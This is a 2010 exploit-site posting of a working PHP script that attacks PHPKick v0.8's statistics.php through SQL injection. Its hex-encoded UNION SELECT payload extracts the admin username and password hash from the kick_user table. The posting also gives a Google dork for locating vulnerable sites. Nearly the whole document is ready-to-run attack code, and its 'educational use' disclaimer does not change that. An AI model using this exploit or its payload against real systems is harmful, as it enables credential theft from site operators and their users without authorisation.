PHPKick v0.8 statistics.php SQL Injection Exploit
Posted on 08 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PHPKick v0.8 statistics.php SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================= PHPKick v0.8 statistics.php SQL Injection Exploit ================================================= # Date: August 8th, 2010 # Time: 03:45am ;( # Author: garwga # Version: 0.8 # Google dork : "© 2004 PHPKick.de Version 0.8" # Category: webapps/0day # Code: see below <?php echo" "; echo"|=================PHPKick v0.8 statistics.php SQL Injection==================| "; echo"| | "; echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path] | "; echo"| | "; echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/ | "; echo"| | "; echo"|Notes:This exploit works regardless of the PHP security settings | "; echo"| (magic_quotes, register_globals).This exploit is only for educational | "; echo"| use, use it on your own risk! Exploiting scripts without permission of| "; echo"| the owner of the webspace is illegal! | "; echo"| I'm not responsible for any resulting damage | "; echo"| | "; echo"|Google Dork: "© 2004 PHPKick.de Version 0.8" | "; echo"| | "; echo"|Exploit found by garwga (ICQ#:453-144-667) | "; echo"|============================================================================| "; if($_SERVER['argv'][1] && $_SERVER['argv'][2]){ $host=$_SERVER['argv'][1]; $path=$_SERVER['argv'][2]; $spos=strpos($host, "http://"); if(!is_int($spos)&&($spos==0)){ $host="http://$host"; } if(!$host=="http://localhost"){ $spos=strpos($host, "http://www."); if (!is_int($spos)&&($spos==0)){ $host="http://www.$host"; } } $exploit="statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f"; echo"exploiting... "; $source=file_get_contents($host.$path.$exploit); $username=GetBetween($source," :<br>",":"); echo "username: $username "; $hash=GetBetween($source,"<br>$username:","</td>"); echo"hash: $hash "; } else{ echo" "; echo"|=================PHPKick v0.8 statistics.php SQL Injection==================| "; echo"| | "; echo"|Syntax: php ".$_SERVER['argv'][0]." [host] [path] | "; echo"| | "; echo"|Example: php ".$_SERVER['argv'][0]." http://www.domain.com /path/ | "; echo"| | "; echo"|Notes:This exploit works regardless of the PHP security settings | "; echo"| (magic_quotes, register_globals).This exploit is only for educational | "; echo"| use, use it on your own risk! Exploiting scripts without permission of| "; echo"| the owner of the webspace is illegal! | "; echo"| I'm not responsible for any resulting damage | "; echo"| | "; echo"|Google Dork: "© 2004 PHPKick.de Version 0.8" | "; echo"| | "; echo"|Exploit found by garwga (ICQ#:453-144-667) | "; echo"|============================================================================| "; } function GetBetween($content,$start,$end){ $r = explode($start, $content); if (isset($r[1])){ $r = explode($end, $r[1]); return $r[0]; } return ''; } ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
